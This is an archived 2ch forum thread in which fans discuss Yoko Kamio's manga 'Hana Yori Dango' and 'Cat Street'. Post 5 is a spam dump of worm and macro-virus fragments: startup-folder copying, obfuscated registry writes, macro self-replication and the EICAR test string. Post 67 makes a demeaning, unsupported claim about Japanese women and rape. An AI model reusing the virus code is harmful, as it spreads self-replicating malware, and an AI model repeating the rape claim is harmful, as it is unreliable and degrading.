2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【花より男子】神尾葉子35【キャットストリート】

1 :花と名無しさん:2007/01/18(木) 07:10:52 ID:???0
花より男子、キャットストリートを語るスレです。
1)ファンサイトなどの話題や個人的中傷などのレスは禁止です。
2)レス900過ぎたら引越し準備、950を踏んだ人が新スレ立てお願いします。
3)煽り・荒らしには反応しない。大人の分別でぐっとこらえてスルーして下さい。
4)お話が盛り上がってもチャット状態にならないよう自粛しましょう。
5)ドラマ話はドラマ板で
 http://ex13.2ch.net/tvd/

前スレ
【花より男子】神尾葉子34【キャットストリート】
http://comic7.2ch.net/test/read.cgi/gcomic/1157815998/

過去ログ倉庫
http://hanadan.s21.xrea.com/

2 :花と名無しさん:2007/01/18(木) 07:11:01 ID:???0
【既出しまくりの質問】
・去年マーガレットに掲載された花男新作読切50ページは完全版第20巻に収録。
通常コミックス(全36巻)には収録されてません。

ttp://annex.s-manga.net/hanadan/

3 :花と名無しさん:2007/01/18(木) 09:46:45 ID:???0
乙です

4 :花と名無しさん:2007/01/18(木) 11:20:52 ID:???0
乙!

5 :花と名無しさん:2007/01/18(木) 17:27:15 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


6 :花と名無しさん:2007/01/18(木) 23:22:12 ID:???O
女子高生コンクリート詰め殺人事件(本スレ)111
http://tmp6.2ch.net/test/read.cgi/youth/1168268769/

7 :花と名無しさん:2007/01/19(金) 10:24:43 ID:GSt8RjDu0
あげ

8 :花と名無しさん:2007/01/20(土) 04:44:31 ID:???0
>>1

まだまだキャット、続いて欲しい。
引き延ばし大作戦じゃなくて、ケイトの仕事とか人間模様をもっと深く掘り下げた感じで。

9 :花と名無しさん:2007/01/20(土) 07:53:09 ID:???0
ドラマのサラはブスすぎ!
サラの透明感ある可愛らしさと性格の良さが全然感じられない
あんなサラじゃ総二郎との切ないシーンが出来るわけない
F4も酷かったけどサラは最悪のキャスティング
楓、椿、西田、つくしパパはイメージ通りでピッタリ
滋は最初見たときルックスでえっ?って思ったけど
演技で滋に似せようとしてるからOK

10 :花と名無しさん:2007/01/20(土) 14:57:41 ID:???0
ドラマ板帰れブス

11 :花と名無しさん:2007/01/21(日) 12:17:34 ID:???O
即死防止

12 :花と名無しさん:2007/01/21(日) 16:09:12 ID:pUiXTa000
あげとこう

13 :花と名無しさん:2007/01/21(日) 16:57:49 ID:n7gkB410O
花男は面白かった

14 :花と名無しさん:2007/01/22(月) 00:39:25 ID:DFQGr6jN0
西門と更のカップルが一番好きでつ

15 :花と名無しさん:2007/01/22(月) 00:48:11 ID:???0
>>9
同感。ブスすぎ
あどけない無邪気なかわいらしさがある人が
よかったのに 
宮崎あおいとかでもいい(他の俳優あんましらないからだけど
とりあえず) ちなみに優紀も全然イメージあってないけど
(元いじめられっことかに見えないし。ちょっとぽっちゃりして
やさしそうなイメージがよかったのに)
でも滋は結構イメージあってた(顔が)

16 :花と名無しさん:2007/01/22(月) 00:53:06 ID:???0
>>14
自分も西門とサラのカプは異様に好きだった。
西門みたいな男が恋した設定はツボなんだけど、その相手に好感持てないと最悪なんだよな。
サラは好感持てて良かった。

逆に優紀は西門の相手には分不相応な感じで好きになれなかったんで
正直別れてくれて心底ホッとした…。

17 :花と名無しさん:2007/01/22(月) 08:22:24 ID:???O
優紀は自分が分不相応だって自覚した上で頑張ってるとこが好きだったな。
頑張れ、あたしっ! って自分励ますとことか。
西門との仲が終わったシーンはスゴく綺麗だった。

18 :花と名無しさん:2007/01/22(月) 08:49:36 ID:???0
>>17
>頑張れ、あたしっ!

>>16じゃないが優紀のそうした描写が特に嫌いだったよ
わざとらしさが鼻についてさ
つくづく人それぞれだなぁ…

19 :花と名無しさん:2007/01/22(月) 12:27:16 ID:???O
あたりまえ

20 :花と名無しさん:2007/01/22(月) 13:49:34 ID:???0
当たり前の事が分からない奴も多い。

21 :花と名無しさん:2007/01/22(月) 14:05:50 ID:???0
>>19って優紀スキーが絡んでるっぽい。

22 :花と名無しさん:2007/01/22(月) 14:22:25 ID:h2NF8AzM0
西門は類の次に好きだったなー

23 :花と名無しさん:2007/01/22(月) 16:47:03 ID:???O
>21ハズレ
申し訳ないですが勝手な思い込みですね残念

24 :花と名無しさん:2007/01/22(月) 20:59:47 ID:???O
西門と玲は同じようなキャラ?

25 :花と名無しさん:2007/01/22(月) 21:03:23 ID:5E5K2J+M0
大分違うよw

26 :花と名無しさん:2007/01/22(月) 21:48:50 ID:???0
ヤリチンなとこは似てるな。

27 :花と名無しさん:2007/01/23(火) 01:28:49 ID:???0
私は西門の次に類が好きだったよ
思ったけどこの二人を同時に好きになる人多くない?

28 :花と名無しさん:2007/01/23(火) 01:31:36 ID:???0
>>27
それはただの面食いでしょ
F4で顔が整ってる二人だからってだけで
人間性まで見る人にとっては正反対のキャラ

29 :花と名無しさん:2007/01/23(火) 02:36:16 ID:???0
>27
ファンサイトでは類西門コンビヲタをよく見かけたよ
やっぱF4でカッコいいのはこの2人なのかな

30 :花と名無しさん:2007/01/23(火) 04:00:25 ID:???0
最初みんな同じ顔してたのに途中から道明寺だけ更に外人顔になったような気がする

31 :花と名無しさん:2007/01/23(火) 04:48:01 ID:???0
西類コンビオタが多いのは二人ともストレートヘアだからでそ。
それだけの理由。

32 :花と名無しさん:2007/01/23(火) 05:29:49 ID:???0
天パよりストレートがカッコイイのは当たり前

33 :花と名無しさん:2007/01/23(火) 06:24:40 ID:???O
そうか?

34 :花と名無しさん:2007/01/23(火) 06:58:41 ID:???0
>>32
キャラや作者の描き方の癖によるだろ。
自分も花男では類や西門、道明寺そっくりのストレート男とかが好みだけど。
神尾さん以外の漫画ではストレートじゃない方を好きだったりもするし。

35 :花と名無しさん:2007/01/23(火) 07:03:53 ID:???0
分かりにくいなら顔を同じにして考えてみなよ
ストレートと天パじゃ全然違って見える
もちろんストレートがかっこよくて天パはダサい

36 :花と名無しさん:2007/01/23(火) 07:09:21 ID:???0
35が考えてみろと言う天パは
チョココロネなんだろうか。

37 :花と名無しさん:2007/01/23(火) 10:08:43 ID:???0
類がチョココルネで道明寺がストレートなの想像したらワロス。
全く違う物語になってたかもな。

38 :花と名無しさん:2007/01/23(火) 10:16:24 ID:???0
まず天パの時点で性格もひねくれるからね
現実の周り見ても天パは劣等感とかコンプレックスで性格が悪い
もち見た目も悪い

39 :花と名無しさん:2007/01/23(火) 10:42:22 ID:???O
ここは天パ差別スレですか?

40 :花と名無しさん:2007/01/23(火) 11:20:48 ID:???0
どこが差別?
例えば目が小さくて細い子とか
団子っ鼻の子とかをブスって言うのが差別になる?
ルックスが良いか悪いかの話をしてるのに差別とか被害妄想すぎ

41 :花と名無しさん:2007/01/23(火) 11:52:27 ID:???O
いやまあ冗談レスだったんだが
それにしてもブスにブスって言うのかおまいはw
よくそれで社会を渡っていけるなw

42 :花と名無しさん:2007/01/23(火) 12:17:42 ID:???0
>>41
妙なのはスルーに限るよ。

43 :花と名無しさん:2007/01/23(火) 13:56:47 ID:???0
話変わるけど、
つくしみたいなタイプがモテるってのが不思議でしょうがない
ああいうのって友達は多いけど女には見られない事が多いくない?
漫画だから、と言えばそれまでだけど

44 :花と名無しさん:2007/01/23(火) 14:29:41 ID:???O
漫画だから

45 :花と名無しさん:2007/01/23(火) 14:43:07 ID:???O
お金持ちの坊ちゃん達の周りに居ないタイプだから?

46 :花と名無しさん:2007/01/23(火) 15:48:04 ID:???O
びんぼーにんにもモテてたよ。

47 :花と名無しさん:2007/01/23(火) 23:12:18 ID:???0
なるほど。じゃあ西門と美作の髪型が逆なら人気も逆になったのかなw

48 :花と名無しさん:2007/01/23(火) 23:34:00 ID:Xc328Nn00
道明寺は髪型以前の問題
あの腐った人間性が最悪
全然更生してなかったことは記憶喪失編で明らかになってしまったしw

49 :花と名無しさん:2007/01/23(火) 23:40:04 ID:???0
弁当箱を踏み潰した場面は恐怖で引いた・・・・・

50 :花と名無しさん:2007/01/23(火) 23:45:25 ID:???0
でも道明寺の髪型まともだったらもっと人気あったんだろうなぁ…

51 :花と名無しさん:2007/01/23(火) 23:56:48 ID:???0
つか、体格デカイ男が凶暴ってコワイって

52 :花と名無しさん:2007/01/24(水) 01:00:09 ID:???0
>>50
あんな最低男がルックスいいだけで人気になる方が間違ってる
中身を見ないでルックスだけで男を選ぶつくしみたいな面食いは
後で絶対不幸になる

53 :花と名無しさん:2007/01/24(水) 01:18:57 ID:???0
>>52
漫画だからいいじゃん。なんか、あきらがフルーツグラタンとか、酢豚にパイナップル駄目な人って、意外だね。いちばん大丈夫そうにみえるのにね。

54 :花と名無しさん:2007/01/24(水) 01:22:00 ID:???0
メイドエピのとき、つくしが楓に見つかっちゃって、かばってくれようとしてクビ宣告されたメイドは、結局クビになったんだろうか。5年以上勤めてたのに、あっさりクビよって言われてた人。タマさんは、つくししかかばってやらなかったのかな。、

55 :花と名無しさん:2007/01/24(水) 04:22:28 ID:???0
>>52
いや道明寺のキャラがどうこうじゃなくて、あの髪型で引いてる人が多いからそう思っただけだよ

56 :花と名無しさん:2007/01/24(水) 04:34:22 ID:???0

ドレットヘアー らしく描けなかった神尾さんの責任



57 :花と名無しさん:2007/01/24(水) 04:41:40 ID:???0
チョココロネよりもミニクロワッサンが頭にいっぱいのってるように見えるw

58 :花と名無しさん:2007/01/24(水) 04:51:52 ID:???0
クロワッサンの中にチョコ入れたのがチョココロネじゃないの?

59 :花と名無しさん:2007/01/24(水) 05:29:53 ID:???0
>>58
激しく違うよ
クロワッサンはパイ生地みたいなサクサクパン
チョココロネは巻き貝ロールパンにチョコが入ってるというか

60 :花と名無しさん:2007/01/24(水) 06:08:09 ID:???0
最近チョコクロワッサンって流行ってるけどね

61 :花と名無しさん:2007/01/24(水) 07:24:02 ID:???0
まあそれは「チョココロネ」じゃないしな。

62 :花と名無しさん:2007/01/24(水) 11:48:41 ID:BCNWGfUG0
うんこ頭ね

63 :花と名無しさん:2007/01/24(水) 14:09:27 ID:???0
天パーだけの問題じゃなくて後ろも刈りあがってるよね

64 :花と名無しさん:2007/01/24(水) 14:24:50 ID:???0
天パー刈りあげ!
個性的スタイル

65 :花と名無しさん:2007/01/25(木) 00:17:50 ID:???O
ノД`)ドウミョウジ…

66 :花と名無しさん:2007/01/25(木) 01:04:00 ID:???O
どー考えても類のが良かったなー。一途だし
未だになんでつくしが道明寺を好きになったかわかんないよ。いじめとかレイプ未遂とかあったのにさ。

67 :花と名無しさん:2007/01/25(木) 01:39:18 ID:???0
でも日本人女性はレイプされるの好きだからね。
ニューヨークタイムスが95年に書いた記事がある。
内容はというと、「日本人女性はレイプされたい願望がある」といったもの。
日本の青年コミックを棚にあげ、そのほかにもレイプされても
警察に訴えない日本人女性の勇気のなさが取り上げられている。
 アメリカ人男性と話すと必ずといっていいほど話にあがる、ナンパのこと。
日本人女性は簡単で落としやすい。すぐエッチをさせてくれる。
一日だけの関係でもオーケーだ。などなど。
ある白人などは「日本にいったら月最低10人は女性を捕まえれるんだろ?
オレ、白人だからモテモテだろうし。」とのたまっている。
 日本人女性は紛れもなく軽く見られているはずである。

68 :花と名無しさん:2007/01/25(木) 01:47:24 ID:???O
つくしはMだから

69 :花と名無しさん:2007/01/25(木) 02:04:32 ID:???0
ドSっぽいんですけど

70 :花と名無しさん:2007/01/25(木) 02:13:03 ID:???O
今日キャット5巻分読み終えた
面白いねー

ちょっと気になってるんだけど山口くんってのはもうあれで出てこない?
ケイトが仕返しされるんじゃ…ってハラハラした


71 :花と名無しさん:2007/01/25(木) 03:05:17 ID:???0
いくら好きな相手でも平手打ちされた時点で私は引くな…

14 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)